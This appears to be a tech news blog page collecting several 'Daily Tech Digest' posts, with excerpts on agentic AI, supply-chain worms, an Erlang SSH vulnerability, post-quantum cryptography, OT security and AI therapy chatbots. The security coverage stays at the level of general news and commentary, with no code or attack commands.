Showing posts with label quantum. Show all posts
Showing posts with label quantum. Show all posts

Daily Tech Digest - February 09, 2026


Quote for the day:

"Leaders who make their teams successful are followed even through the hardest journeys." -- Gordon Tredgold



Agentic AI upends SaaS models & sparks valuation shock

The Software-as-a-Service market is moving away from seat-based licensing as agentic artificial intelligence tools change how companies build and purchase business software, according to analysts and industry executives. Investors have already reacted to the shift. A broad sell-off in software stocks followed recent advances in agentic technology, raising questions regarding the durability of current business models. Concerns persist that traditional revenue streams may be at risk as autonomous systems perform increasing volumes of work with fewer human users. ... Not every vendor is well positioned for the transition. Industry observers are using the term "zombie SaaS" for companies that raised large rounds at peak valuations from 2020 to 2022 and now trade or transact below the total capital invested. These businesses often face a mismatch between historical expectations and current demand. They can struggle to raise new funding and may lack the growth rate needed to justify earlier valuations. Meanwhile, newer entrants can build competing products faster and at lower cost, increasing pressure on incumbents with larger cost structures. ... AI is also reshaping procurement decisions. Some companies are shifting toward internal tools as non-technical teams gain access to systems that generate software from natural-language prompts and templates. Industry discussion points to Ramp building internal revenue tools and AI agents in place of third-party software. 


Software developers: Prime cyber targets and a rising risk vector for CISOs

Attackers are increasingly targeting the tools, access, and trusted channels used by software developers rather than simply exploiting application bugs. The threats blend technical compromise — malicious packages, development pipeline abuse, etc. — with social engineering and AI-driven attacks. ... The tokens, API keys, cloud credentials, and CI/CD secrets held by software developers unlock far broader access than a typical office user account, making software engineers a prime target for cybercriminals. “They [developers] hold the keys to the kingdom, privileged access to source code and cloud infrastructure, making them a high-value target,” Wood adds. ... Attackers aren’t just looking for flaws in code — they’re looking for access to software development environments. Common security shortcomings, including overprivileged service accounts, long-lived tokens, and misconfigured pipelines, offer a ready means for illicit entry into sensitive software development environments. “Improperly stored access credentials are low-hanging fruit for even the most amateur of threat actors,” says Crystal Morin, senior cybersecurity strategist at cloud-native security and observability vendor Sysdig. ... AI-assisted development and “vibe coding” are increasing exposure to risk, especially because such code is often generated quickly without adequate testing, documentation, or traceability.


How network modernization enables AI success and quantum readiness

In essence, inadequate networks limit the ability of AI “blood” to nourish the body of an organization — weakening it and stifling its growth. Many enterprise networks developed incrementally over time, with successive layers of technology implemented over time. Mergers, divestitures, and one-off projects to solve immediate problems have left organizations with a patchwork of architectures, vendors and configurations. ... As AI traffic increases across data centers, clouds, and the edge, blind spots multiply. Once-manageable technical debt becomes an active security liability, expanding the attack surface and undermining Zero Trust initiatives as AI-driven traffic increases. ... Quantum computers could break today’s encryption standards, exposing sensitive financial, healthcare and operational data. Worse, attackers are already engaging in “harvest now, decrypt later” strategies — stealing encrypted data today to exploit tomorrow. The relevance to networking and AI issues is straightforward. Preparing for the challenges (and opportunities) of quantum computing will be an incremental, multi-year project that needs to start now. Enterprise IT infrastructures must be able to adapt and scale to quantum computing developments as they evolve. Companies will need to be able to “skate to where the puck will be,” and then skate again! While becoming quantum-safe may seem daunting, organizations don’t have to do it all at once. 


Rethinking next-generation OT SOC as IT/OT convergence reshapes industrial cyber defense

Clear gains from next-generation OT SOC innovation emerge across real-world applications, such as OT-aware detection, AI-assisted triage, and distributed SOC models designed to reflect the day-to-day realities of operating critical infrastructure. ... The line between what is OT and what is IT is blurred. Each customer, scenario, and request proposal shows a unique fingerprint of architectural, process, and industry-related concerns. Our OT SOC development program integrated industrial network sensors with enterprise SOC, enabling holistic monitoring of plants and offices together. ... Risk is no longer discussed purely from a cyber perspective, but in terms of operational impact, safety, and reliability, which is more consequence-driven. When convergence is implemented securely, alerts are no longer investigated in isolation; identity, remote access activity, asset criticality, and process context are correlated together. ... From a practical standpoint, Mashirova said that automation delivers the most operational value in enrichment, correlation, prioritization, and workflow orchestration. “Automating asset context, vulnerability risk prioritization with remediation recommendations, alert deduplication, and escalation logic dramatically improves analyst efficiency without directly impacting the industrial process. AI agents can act as SOC assistants by correlating large volumes of data and providing decision support to analysts.”


Shai-hulud: The Hidden Cost of Supply Chain Attacks

In recent months, a somewhat novel supply chain threat has emerged against the open source community; attackers are unleashing self-propagating malware on component libraries and targeting downstream victims with infostealers. The most famous recent example of this is Shai-hulud, a worm targeting NPM projects that would take hold when a victim downloads a poisoned component. Once on a victim machine, the malware used its access to infect components that the victim maintains before self-publishing poisoned versions. ... Another consideration is long-term, lasting damage from these incidents. Sygnia's Kidron explains that the impact of a compromise like credential theft happens on a wider time scale. If the issue has not been adequately contained, attackers can sell access or use it for follow-on activity later. "In practice, damage unfolds across time frames. Immediately — within hours to the first few days after exposure, the primary risk is credential exposure: these campaigns are designed to execute inside developer and CI/CD paths where tokens and secrets are accessible," he says. "When those secrets leak, the downstream harm is not abstract — the attacker can use them (or sell them) to authenticate as the victim and access private repositories, pull data, tamper with code, trigger builds, publish packages, access cloud resources, or perform actions “on behalf” of legitimate identities." 


United Airlines CISO on building resilience when disruption is inevitable

Modernization in aviation is less about speed and more about precision. Every change must measurably improve safety, reliability, or resilience. Cybersecurity must respect that bar. ... Cyber risk is assessed in terms of how it affects the ability to move aircraft, crew, and passengers safely and on time. It also means cybersecurity leaders must understand the business end-to-end. You cannot protect an airline effectively without understanding flight operations, maintenance, weather, crew scheduling, and regulatory constraints. Cybersecurity becomes an enabler of safe operations, not a separate technical function. ... Risk assessment goes beyond vendor questionnaires. It includes scenario analysis, operational impact modeling, and close coordination with partners, regulators, and industry groups. Information sharing is essential, because early awareness often matters more than perfect control. Ultimately, we assume some disruptions will originate externally. The goal is to detect them quickly, understand their operational impact, and adapt without compromising safety. Resilience and coordination are just as important as contractual controls. ... Speed matters, but clarity matters more. We also plan extensively in advance. You cannot improvise under pressure when aircraft and passengers are involved. Clear playbooks, rehearsals, and defined decision authorities allow teams to act decisively while staying aligned with safety principles.


Securing IoT devices: why passwords are not enough

Traditional passwords are often not secure enough for technological devices or systems. Many consumers use the default password that comes with the system rather than changing it to a more secure one. When people update their passwords, they often choose weak ones that are easy for cyberattackers to crack. The volume of IoT devices makes manual password management inefficient and risky. A primary threat is the lack of encryption as data travels between networks. When multiple devices are connected, encryption is key to protecting information. Another threat is poor network segmentation, which means connected devices are misconfigured or less secure. ... Adopting a zero-trust methodology is a better cybersecurity measure than traditional password-based systems. IoT devices can still require a password, but the system may ask for additional information to verify the user’s authorization. Users can set up passkeys, security questions or other methods as the next step after entering a password. ... AI can be used both offensively and defensively in cybersecurity for IoT devices. Hackers use AI to launch advanced attacks, but users can also implement AI to detect suspicious behaviour and address threats. Consumers can purchase AI security systems to safeguard their IoT devices beyond passwords, but they must remain vigilant and continuously monitor their usage to prevent cyberattackers from infiltrating them.


Creating a Top-Down and Bottom-Up Grounded Capability Model

A grounded capability model is a complete and stable set of these capabilities, structured in levels from level 1 to sometimes level 4 so senior leaders, middle managers, architects, and digital transformation managers can see the business as an integrated whole. The “grounded” part matters: it means the model reflects strategy and business design, not the quirks of today’s org chart or application portfolio. ... Business Architecture Info emphasizes that a grounded capability model is best built by combining top-down strategic direction with bottom-up operational reality. The top-down view ensures the model is aligned to the business plan and strategic goals, while the bottom-up view ensures it is validated against real value streams, objectives, and subject-matter expertise. ... Top-down capability modeling needs the right stakeholders and the right strategic inputs. On the stakeholder side, senior leaders are essential because they own direction, priorities, and the definition of “what good looks like.” The EA team, enterprise architects and business architects, translates that direction into a structured capability view. ... Bottom-up capability modeling grounds the model in delivery and operational truth. It relies heavily on middle managers, subject matter experts, and business experts. In other words, people who know how value is produced, where friction exists, and what “enablement” really takes. The EA team remains a key facilitator and modeler, but validation and discovery come from the business.


Secure The Path, Not The Chokepoint

The argument here is simple: baseline security policy should be enforced along the path where packets already travel. Programmable data planes, particularly P4 on programmable switching targets, make it possible to enforce meaningful guardrails at line rate, close to the workload, without redesigning the network into a set of security detours. ... When enforcement is concentrated on a few devices, the architecture depends on traffic detours or assumptions about where traffic flows. That creates three practical problems: First, important east west traffic may never traverse an inspection point. Second, response actions often depend on where a firewall sits rather than where the attacker is operating. Third, changes become slow and risky because every new workload pattern becomes another exception. ... A fabric first model succeeds when it focuses on controls that are simple, universal, and have a high impact. ... A fabric first approach does not remove the need for firewalls. Deep application inspection, proxy functions, content controls, and specialized policy workflows still make sense where rich context exists and where inspection overhead is acceptable. The shift is about default placement. Baseline guardrails and rapid containment belong in the fabric. ... A small set of metrics usually tells the story clearly: time from detection to enforced containment, reduction in unintended internal connection attempts, and time to produce a credible incident narrative during review.


Banks Face Dual Authentication Crisis From AI Agents

Traditional authentication relies upon point-in-time verification like MFA and a password, after which access is granted. Over the years, banks have analyzed human spending patterns. But AI agents purchasing around the clock and seeking optimal deals have rendered that model obsolete. "With autonomous agents transacting on behalf of users, the distinction between legitimate and fraudulent activity is blurred, and a single compromised identity could trigger automated losses at scale," said Ajay Patel, head of agentic commerce at Prove. ... But before banks can address the authentication problem, they need to fix their data infrastructure, said Carey Ransom, managing director at BankTech Ventures. AI agents need clean, contextually appropriate data, banks don't yet have standardized ways to provide it. So, when mistakes occur, who is at fault, and who is liable for making things right? When AI agents can spawn sub-agents that delegate tasks to other AI systems throughout a transaction chain, the liability question gets murky. ... Layered authentication that balances security with the speed will reduce agentic AI valuable risks, Ransom said. "Variant transaction requests might require a new layer or type of authentication to ensure it is legitimate and reflecting the desired activity," he said. "Checks and balances will be a prevailing approach to protect both sides, while still enabling the autonomy and efficiency the market desires."

Daily Tech Digest - October 06, 2025


Quote for the day:

"Success seems to be connected with action. Successful people keep moving. They make mistakes but they don’t quit." -- Conrad Hilton


Beyond Von Neumann: Toward a unified deterministic architecture

In large AI workloads, datasets often cannot fit into caches, and the processor must pull them directly from DRAM or HBM. Accesses can take hundreds of cycles, leaving functional units idle and burning energy. Traditional pipelines stall on every dependency, magnifying the performance gap between theoretical and delivered throughput. Deterministic Execution addresses these challenges in three important ways. First, it provides a unified architecture in which general-purpose processing and AI acceleration coexist on a single chip, eliminating the overhead of switching between units. Second, it delivers predictable performance through cycle-accurate execution, making it ideal for latency-sensitive applications such as large langauge model (LLM) inference, fraud detection and industrial automation. Finally, it reduces power consumption and physical footprint by simplifying control logic, which in turn translates to a smaller die area and lower energy use. ... For enterprises deploying AI at scale, architectural efficiency translates directly into competitive advantage. Predictable, latency-free execution simplifies capacity planning for LLM inference clusters, ensuring consistent response times even under peak loads. Lower power consumption and reduced silicon footprint cut operational expenses, especially in large data centers where cooling and energy costs dominate budgets. 


Invest in quantum adoption now to be a winner in the quantum revolution

History shows that transformative compute paradigms require years of preparation before delivering real returns. Graphics processing units (GPUs), for example, took more than a decade of groundwork before fueling the AI revolution that now powers almost every sector of the economy. Organizations that invested early positioned themselves to capture this growth, while those who waited paid more, were caught flat-footed, and lost ground to competitors. Quantum will follow the same trajectory. ... Investing in readiness today reduces both risk and cost. By spreading integration work over time, organizations avoid the disruption and price premium of a sudden adoption push once the full enterprise value of quantum computing is achieved. Budget holders know that rushed, unplanned programs often exceed forecasts and erode margins. Smaller projects with clear deliverables can be managed within existing budgets and allow lessons to be learned incrementally, lowering both financial exposure and operational risk. For decision-makers, this creates a predictable investment profile rather than a costly “big bang” rollout. Early engagement also builds skills at a fraction of the future cost. Recruiting or retraining talent under pressure once the market overheats will be significantly more expensive. 


What an IT career will look like in 5 years — and how to thrive through the changes

Success in the near future will depend less on narrow expertise — mastering a specific technology stack for example — and more on evaluating, adapting, and applying the right tools to solve organizational problems. “People shift into cloud, security, data, or AI work depending on business need,” says Chris Camacho, COO and co-founder at Abstract Security. “Titles matter less than visible proof-of-work — small wins shared internally or publicly. Pick a lane and go deep, then layer AI expertise on top. And show your work — on GitHub, LinkedIn, wherever recruiters can see results.” Justina Nixon-Saintil, global chief impact officer at IBM, says success in the future will favor those who are adaptable and use AI to amplify creativity rather than replace it. “Technology roles are evolving from traditional tasks into more dynamic, interdisciplinary pathways that blend technical expertise with strategic thinking,” Nixon-Saintil says. “Those who can navigate the ethical challenges of AI and technology will succeed, leveraging innovation responsibly to solve complex problems and anticipate evolving business needs. You’ll not only future-proof your career but also unlock new opportunities for growth and innovation.” Beth Scagnoli, vice president of product management of Redpoint Global, agrees the successful pro of the near future will easily move between related but traditionally separate IT domains, such as system architecture and development.


Using AI as a Therapist? Why Professionals Say You Should Think Again

It can be incredibly tempting to keep talking to a chatbot. When I conversed with the "therapist" bot on Instagram, I eventually wound up in a circular conversation about the nature of what is "wisdom" and "judgment," because I was asking the bot questions about how it could make decisions. This isn't really what talking to a therapist should be like. Chatbots are tools designed to keep you chatting, not to work toward a common goal. One advantage of AI chatbots in providing support and connection is that they're always ready to engage with you. That can be a downside in some cases, where you might need to sit with your thoughts, Nick Jacobson, an associate professor of biomedical data science and psychiatry at Dartmouth, told me recently.  ... While chatbots are great at holding a conversation -- they almost never get tired of talking to you -- that's not what makes a therapist a therapist. They lack important context or specific protocols around different therapeutic approaches, said William Agnew, a researcher at Carnegie Mellon University and one of the authors of the recent study alongside experts from Minnesota, Stanford and Texas. "To a large extent it seems like we are trying to solve the many problems that therapy has with the wrong tool," Agnew told me. "At the end of the day, AI in the foreseeable future just isn't going to be able to be embodied, be within the community, do the many tasks that comprise therapy that aren't texting or speaking."


CISOs rethink the security organization for the AI era

“Organizations that have invested in security over time are seeing efficiencies by layering AI-driven tools into their workflows,” Oleksak says. “But those who haven’t taken security seriously are still stuck with the same exposures they’ve always had. AI doesn’t magically catch them up.’” In fact, because attackers are using AI to make phishing, scanning, and deepfakes cheaper and faster, Oleksak adds, the gap between mature and unprepared organizations is widening. ... “We’re now embedding cybersecurity into AI initiatives from the start, working closely across teams to ensure innovation is both safe and ethical,” she stresses. “Our commitment to responsible AI means every solution is designed with transparency, fairness, and accountability in mind.” Jason Lander, senior vice president of product management at Aya Healthcare, who manages security for the organization, is also seeing a change in the dynamics between cybersecurity and IT. “AI is noticeably reshaping how security and IT departments collaborate, streamline workflows, blend responsibilities, make decisions and redefine trust dynamics,” he says.  ... “IT’s focus is on speed, efficiency, and enabling the business, while the CISO’s focus is on protecting the business. That distinction is often misunderstood,” he maintains. “As AI introduces powerful new risks, from deepfakes and AI-driven phishing to employees unintentionally exposing sensitive IP through AI queries, only the CISO is positioned to anticipate and mitigate these threats.”


Why Secure Data Migration is the Next Big Boardroom Priority

Industries with the highest dependency on sensitive data are leading the way in secure migration. Financial services, with their heavy regulatory responsibilities and high stakes for customer trust, are among the most proactive industries when it comes to secure data migration. Banks moving from legacy mainframes to cloud-native platforms know that a single misstep could cascade into systemic risk. Healthcare, another high-stakes sector, faces similar urgency. ... Technology hyperscalers such as Microsoft, Google, and Amazon Web Services (AWS) play a dual role: enablers of secure migration and, simultaneously, critical dependencies for enterprises. This reliance brings resilience but also concentration risk. Many CIOs remain concerned about vendor lock-in, even as few alternatives exist at a comparable scale. Enterprises must therefore ensure secure migration while also diversifying their strategy to avoid overreliance on a single ecosystem. ... The shift is clear: secure data migration is no longer an IT department problem. It is a board-level agenda item, shaping strategy and shareholder value. As per the latest findings, 82% of CISOs now directly report to the CEO’s, underscoring their elevated importance. The World Economic Forum has gone further, warning in its 2025 Global Risks Report that data migration failures represent an underappreciated threat to global business resilience


How self-learning AI agents will reshape operational workflows

Experience-based training for AI agents offers strong potential because it allows agents to act autonomously in real-world situations, guided by rewards that emerge from the environment. In the context of operations management, this means agents can learn from past incidents, events, customer tickets, application and infrastructure metrics and logs, as well as any other metrics made available to them. While modern-day hype cycles demand rapid results, much of the promise of AI agents lies in how they will improve operations management over time. Given enough time and training data, the AI agent will be able to plan actions and predict their consequences in the environment—i.e., predict the reward—much better than a human. ... Experience-based learning in this context requires human engineers to conduct post-incident reviews to understand an incident and establish actions to prevent that incident from recurring. However, in many cases, the learnings from a post-incident review are siloed to individual teams and not shared with the wider organization. ... Given that organizations do not consistently conduct post-incident learning reviews or share their findings across the wider organization, operations management is ripe for “agentification” powered by self-learning agents. Instead of burdening busy human engineers with post-incident reviews, AI agents can conduct these reviews and then apply this valuable experience-based training data. 


The DPDPA’s impact on law firms

Most of the personal data processing in HR departments is for purposes related to employment. The DPDPA does provide exemption from obtaining consent from employment purposes under Sec. 7(i) ... However, a reading of this Section would indicate that this exemption is applicable only to current employees and it excludes all processing which happens post-employment or pre-employment. In some instances, where an employee or intern voluntarily emails their resumes to HR departments and the HR departments do not consider the application or take any action on the resume received through email, the DPDPA compliances will not kick in as DPDPA does not apply to personal data which is provided voluntarily by a data principal. But HR departments will need to be vigilant about data collected through designated online portals available on their websites, as in such a case, they can be said to be actively inviting applications unlike the former scenario wherein a candidate is voluntarily sharing their data. ... Under Section 3 of the DPDPA, any foreign entity offering services to individuals in India falls within the law’s extra-territorial scope. ... Several law firms in India have shown significant efforts in enhancing operational standards to ensure that client and partner data is handled safely. Several law firms have implemented standards like ISO 27001, which improves information security, risk management and compliance with regulations.



Is quantum computing poised for another breakthrough?

“Almost all of us in the quantum computing field are absolutely convinced,” Kulkarni said. “But even the skeptics who always thought this was something of the future and never really going to materialize, I think, can concur with us that this is going to happen.” ... Quantum processors currently provide physicists and other scientists with the tools to do big research projects that simply aren’t realistic with other computers. That’s the main use of the technology for now, Boixo said, but as things continue to move forward, the pool of who will use quantum computers will grow. Of course, it’s not just scientists trying to uncover the limits of quantum technology who are using the computers. Marc Lijour, a researcher with the Institute of Electrical and Electronics Engineers, told IT Brew that attackers are interested in how quantum computers can potentially crack encryption much faster than traditional computers. They’re probably already playing with the technology, and waiting until the computers are widely available. “Attackers…are downloading everything they can at the moment and storing it, basically copying the internet and anything they can so they can open it later [using quantum technology],” Lijour said. That’s still a ways in the future. Boixo estimated chaining together 50–100 logical qubits is about five or so years away. With a number of firms looking at developing the next level of quantum computing, it’s a race. 


CISO Spotlights Cybersecurity Challenges in Education Following Kido Breach

Budget is certainly going to be a challenge for all, but more so for state-funded schools and organizations. We do see that as being a challenge everywhere, they have limited resources. The overwhelming feedback is that they just don't have any money to spend, and it's perceived that, therefore, that they can't deploy the security controls that they need. That's a big thing, but I think an even bigger issue is the lack of expertise and time. On lots of occasions you’ll discover institutions where there just aren’t experts on the ground that can manage these cybersecurity risks. They often lean on IT service providers and assume that they’re doing something about cybersecurity, whereas that is not necessarily the case. Budget, expertise and time are big constraints, and I think those issues are causing so many schools to be vulnerable. ... There are plenty of things that can be done with little or no cost. Reviewing all the users, identifying who’s got access and making sure MFA is turned on doesn't carry a significant cost beyond somebody taking the time to do it. That’s going to have a material impact on their posture. Most schools will have an awareness training program, but it's probably a tick box exercise where somebody has to do the course when they join and that’s it. Assigning one person to really own and champion that program could make a material difference to peoples’ awareness.

Daily Tech Digest - August 16, 2025


Quote for the day:

"Develop success from failures. Discouragement and failure are two of the surest stepping stones to success." -- Dale Carnegie


Digital Debt Is the New Technical Debt (And It’s Worse)

Digital debt doesn’t just slow down technology. It slows down business decision-making and strategic execution. Decision-Making Friction: Simple business questions require data from multiple systems. “What’s our customer lifetime value?” becomes a three-week research project because customer data lives in six different platforms with inconsistent definitions. Campaign Launch Complexity: Marketing campaigns that should take two weeks to launch require six weeks of coordination across platforms. Not because the campaign is complex, but because the digital infrastructure is fragmented. Customer Experience Inconsistency: Customers encounter different branding, messaging, and functionality depending on which digital touchpoint they use. Support teams can’t access complete customer histories because data is distributed across systems. Innovation Paralysis: New initiatives get delayed because teams spend time coordinating existing systems rather than building new capabilities. Digital debt creates a gravitational pull that keeps organizations focused on maintenance rather than innovation. ... Digital debt is more dangerous than technical debt because it’s harder to see and affects more stakeholders. Technical debt slows down development teams. Digital debt slows down entire organizations.


Rising OT threats put critical infrastructure at risk

Attackers are exploiting a critical remote code execution (RCE) vulnerability in the Erlang programming language's Open Telecom Platform, widely used in OT networks and critical infrastructure. The flaw enables unauthenticated users to execute commands through SSH connection protocol messages that should be processed only after authentication. Researchers from Palo Alto Networks' Unit 42 said they have observed more than 3,300 exploitation attempts since May 1, with about 70% targeting OT networks across healthcare, agriculture, media and high-tech sectors. Experts urged affected organizations to patch immediately, calling it a top priority for any security team defending an OT network. The flaw, which has a CVSS score of 10, could enable an attacker to gain full control over a system and disrupt connected systems -- particularly worrisome in critical infrastructure. ... Despite its complex cryptography, the protocol contains design flaws that could enable attackers to bypass authentication and exploit outdated encryption standards. Researcher Tom Tervoort, a security specialist at Netherlands-based security company Secura, identified issues affecting at least seven different products, resulting in the issuing of three CVEs.


Why Tech Debt is Eating Your ROI (and How To Fix It)

Regardless of industry or specific AI efforts, these frustrations seem to boil down to the same culprit. Their AI initiatives continue to stumble over decades of accumulated tech debt. Part of the reason is despite the hype, most organizations use AI — let’s say, timidly. Fewer than half employ it for predictive maintenance or detecting network anomalies. Fewer than a third use it for root-cause analysis or intelligent ticket routing. Why such hesitation? Because implementing AI effectively means confronting all the messiness that came before. It means admitting our tech environments need a serious cleanup before adding another layer of complexity. Tech complexity has become a monster. This mess came from years of bolting on new systems without retiring old ones. Some IT professionals point to redundant applications as a major source of wasted budget and others blame overprovisioning in the cloud — the digital equivalent of paying rent on empty apartments. ... IT teams admit something that, to me, is alarming: Their infrastructure has grown so tangled they can no longer maintain basic security practices. Let that sink in. Companies with eight-figure tech budgets can’t reliably patch vulnerable systems or implement fundamental security controls. No one builds silos deliberately. Silos emerge from organizational boundaries, competing priorities and the way we fund and manage projects. 


Ready on paper, not in practice: The incident response gap in Australian organisations

The truth is, security teams often build their plans around assumptions rather than real-world threats and trends. That gap becomes painfully obvious during an actual incident, when organisations realise they aren't adequately prepared to respond. Recent findings of a Semperis study titled The State of Enterprise Cyber Crisis Readiness revealed a strong disconnect between organisations' perceived readiness to respond to a cyber crisis and their actual performance. The study also showed that cyber incident response plans are being implemented and regularly tested, but not broadly. In a real-world crisis, too many teams are still operating in silos. ... A robust, integrated, and well-practiced cyber crisis response plan is paramount for cyber and business resilience. After all, the faster you can respond and recover, the less severe the financial impact of a cyberattack will be. Organisations can increase their agility by conducting tabletop exercises that simulate attacks. By practicing incident response regularly and introducing a range of new scenarios of varying complexity, organisations can train for the real thing, which can often be unpredictable. Security teams can continually adapt their response plans based on the lessons learned during these exercises, and any new emerging cyber threats.


Quantum Threat Is Real: Act Now with Post Quantum Cryptography

Some of the common types of encryption we use today include RSA (Rivest-Shamir-Adleman), ECC (Elliptic Curve Cryptography), and DH (Diffie-Hellman Key Exchange). The first two are asymmetric types of encryption. The third is a useful fillip to the first to establish secure communication, with secure key exchange. RSA relies on very large integers, and ECC, on very hard-to-solve math problems. As can be imagined, these cannot be solved with traditional computing. ... Cybercriminals think long-term. They are well aware that quantum computing is still some time away. But that doesn’t stop them from stealing encrypted information. Why? They will store it securely until quantum computing becomes readily available; then they will decrypt it. The impending arrival of quantum computers has set the cat amongst the pigeons. ... Blockchain is not unhackable, but it is difficult to hack. A bunch of cryptographic algorithms keep it secure. These include SHA-256 (Secure Hash Algorithm 256-bit) and ECDSA (Elliptic Curve Digital Signature Algorithm). Today, cybercriminals might not attempt to target blockchains and steal crypto. But tomorrow, with the availability of a quantum computer, the crypto vault can be broken into, without trouble. ... We keep saying that quantum computing and quantum computing-enabled threats are still some time away. And, this is true. But when the technology is here, it will evolve and gain traction. 


Cultivating product thinking in your engineering team

The most common trap you’ll encounter is what’s called the “feature factory.” This is a development model where engineers are simply handed a list of features to build, without context. They’re measured on velocity and output, not on the value their work creates. This can be comfortable for some – it’s a clear path with measurable metrics – but it’s also a surefire way to kill innovation and engagement. ... First and foremost, you need to provide context, and you need to do so early and often. Don’t just hand a Jira ticket to an engineer. Before a sprint starts, take the time to walk through the “what,” the “why,” and the “who.” Explain the market research that led to this feature request, share customer feedback that highlights the problem, and introduce them to the personas you’re building for. A quick 15-minute session at the start of a sprint can make a world of difference. You should also give engineers a seat at the table. Invite them to meetings where product managers are discussing strategy and customer feedback. They don’t just need to hear the final decision; they need to be a part of the conversation that leads to it. When an engineer hears a customer’s frustration firsthand, they gain a level of empathy that a written user story can never provide. They’ll also bring a unique perspective to the table, challenging assumptions and offering technical solutions you may not have considered.


Adapting to New Cloud Security Challenges

While the essence of Non-Human Identities and their secret management is acknowledged, many organizations still grapple with the efficient implementation of these practices. Some stumble upon the over-reliance on traditional security measures, thereby failing to adopt newer, more effective strategies that incorporate NHI management. Others struggle with time and resource constraints, devoid of efficient automation mechanisms – a crucial aspect for proficient NHI management. The disconnect between security and R&D teams often results in fractured efforts, leading to potential security gaps, breaches, and data leaks. ... With more organizations migrate to the cloud and with the rise of machine identities and secret management, the future of cloud security has been redefined. It is no longer solely about the protection from known threats but now involves proactive strategies to anticipate and mitigate potential future risks. This shift necessitates organizations to rethink their approach to cybersecurity, with a keen focus on NHIs and Secrets Security Management. It requires an integrated endeavor, involving CISOs, cybersecurity professionals, and R&D teams, along with the use of scalable and innovative platforms. Thought leaders in the data field continue to emphasize the importance of robust NHI management as vital to the future of cybersecurity, driving the message home for businesses of all sizes and across all industries.


Why IT Modernization Occurs at the Intersection of People and Data

A mandate for IT modernization doesn’t always mean the team has the complete expertise necessary to complete that mandate. It may take some time to arm the team with the correct knowledge to support modernization. Let’s take data analytics, for example. Many modern data analytics solutions, armed with AI, now allow teams to deliver natural language prompts that can retrieve the data necessary to inform strategic modernization initiatives without having to write expert-level SQL. While this lessens the need for writing scripts, IT leaders must still ensure their teams have the right expertise to construct the correct prompts. This could mean training on correct terms for presenting data and/or manipulating data, along with knowing in what circumstances to access that data. Having a well-informed and educated team will be especially important after modernization efforts are underway. ... One of the most important steps to IT modernization is arming your IT teams with a complete picture of the current IT infrastructure. It’s equivalent to giving them a full map before embarking on their modernization journey. In many situations, an ideal starting point is to ensure that any documentation, ER diagrams, and architectural diagrams are collected into a single repository and reviewed. Then, the IT teams use an observability solution that integrates with every part of the enterprise infrastructure to show each team how every part of it works together. 


Cyber Resilience Must Become The Third Pillar Of Security Strategy

For years, enterprise security has been built around two main pillars: prevention and detection. Firewalls, endpoint protection, and intrusion detection systems all aim to stop attackers before they do damage. But as threats grow more sophisticated, it’s clear that this isn’t enough. ... The shift to cloud computing has created dangerous assumptions. Many organizations believe that moving workloads to AWS, Azure, or Google Cloud means the provider “takes care of security.” ... Effective resilience starts with rethinking backup as more than a compliance checkbox. Immutable, air-gapped copies prevent attackers from tampering with recovery points. Built-in threat detection can spot ransomware or other malicious activity before it spreads. But technology alone isn’t enough. Mariappan urges leaders to identify the “minimum viable business” — the essential applications, accounts, and configurations required to function after an incident. Recovery strategies should be built around restoring these first to reduce downtime and financial impact. She also stresses the importance of limiting the blast radius. In a cloud context, that might mean segmenting workloads, isolating credentials, or designing architectures that prevent a single compromised account from jeopardizing an entire environment.


Breaking Systems to Build Better Ones: How AI is Reshaping Chaos Engineering

While AI dominates technical discussions across industries, Andrus maintains a pragmatic perspective on its role in system reliability. “If Skynet comes about tomorrow, it’s going to fail in three days. So I’m not worried about the AI apocalypse, because AI isn’t going to be able to build and maintain and run reliable systems.” The fundamental challenge lies in the nature of distributed systems versus AI capabilities. “A lot of the LLMs and a lot of what we talk about in the AI world is really non deterministic, and when we’re talking about distributed systems, we care about it working correctly every time, not just most of the time.” However, Andrus sees valuable applications for AI in specific areas. AI excels at providing suggestions and guidance rather than making deterministic decisions. ... Despite its name, chaos engineering represents the opposite of chaotic approaches to system reliability. “Chaos engineering is a bit of a misnomer. You know, a lot of people think, Oh, we’re going to go cause chaos and see what happens, and it’s the opposite. We want to engineer the chaos out of our systems.” This systematic approach to understanding system behavior under stress provides the foundation for building more resilient infrastructure. As AI-generated code increases system complexity, the need for comprehensive reliability testing becomes even more critical. 

Daily Tech Digest - August 20, 2024

Humanoid robots are a bad idea

Humanoid robots that talk, perceive social and emotional cues, elicit empathy and trust, trigger psychological responses through eye contact and who trick us into the false belief that they have inner thoughts, intentions and even emotions create for humanity what I consider a real problem. Our response to humanoid robots is based on delusion. Machines — tools, really — are being deliberately designed to hack our human hardwiring and deceive us into treating them as something they’re not: people. In other words, the whole point of humanoid robots is to dupe the human mind, to mislead us into have the kind of connection with these machines formerly reserved exclusively for other human beings. Why are some robot makers so fixated on this outcome? Why isn’t the goal instead to create robots that are perfectly designed for their function, rather than perfectly designed to trick the human mind? Why isn’t there a movement to make sure robots do not elicit false emotions and beliefs. What’s the harm in preserving our intuition that a robot is just a machine, just a tool? Why try to route around that intuition with machines that trick our minds, coopting or hijacking our human empathy?


11 Irritating Data Quality Issues

Organizations need to put data quality first and AI second. Without dignifying this sequence, leaders fall into fear of missing out (FOMO) in attempts to grasp AI-driven cures to either competitive or budget pressures, and they jump straight into AI adoption before conducting any sort of honest self-assessment as to the health and readiness of their data estate, according to Ricardo Madan, senior vice president at global technology, business and talent solutions provider TEKsystems. “This phenomenon is not unlike the cloud migration craze of about seven years ago, when we saw many organizations jumping straight to cloud-native services, after hasty lifts-and-shifts, all prior to assessing or refactoring any of the target workloads. This sequential dysfunction results in poor downstream app performance since architectural flaws in the legacy on-prem state are repeated in the cloud,” says Madan in an email interview. “Fast forward to today, AI is a great ‘truth serum’ informing us of the quality, maturity, and stability of a given organization’s existing data estate -- but instead of facing unflattering truths, invest in holistic AI data readiness first, before AI tools."


CISOs urged to prepare now for post-quantum cryptography

Post-quantum algorithms often require larger key sizes and more computational resources compared to classical cryptographic algorithms, a challenge for embedded systems, in particular. During the transition period, systems will need to support both classical and post-quantum algorithms to support interoperability with legacy systems. Deidre Connolly, cryptography standardization research engineer at SandboxAQ, explained: “New cryptography generally takes time to deploy and get right, so we want to have enough lead time before quantum threats are here to have protection in place.” Connolly added: “Particularly for encrypted communications and storage, that material can be collected now and stored for a future date when a sufficient quantum attack is feasible, known as a ‘Store Now, Decrypt Later’ attack: upgrading our systems with quantum-resistant key establishment protects our present-day data against upcoming quantum attackers.” Standards bodies, hardware and software manufacturers, and ultimately businesses across the globe will have to implement new cryptography across all aspects of their computing systems. Work is already under way, with vendors such as BT, Google, and Cloudflare among the early adopters.


AI for application security: Balancing automation with human oversight

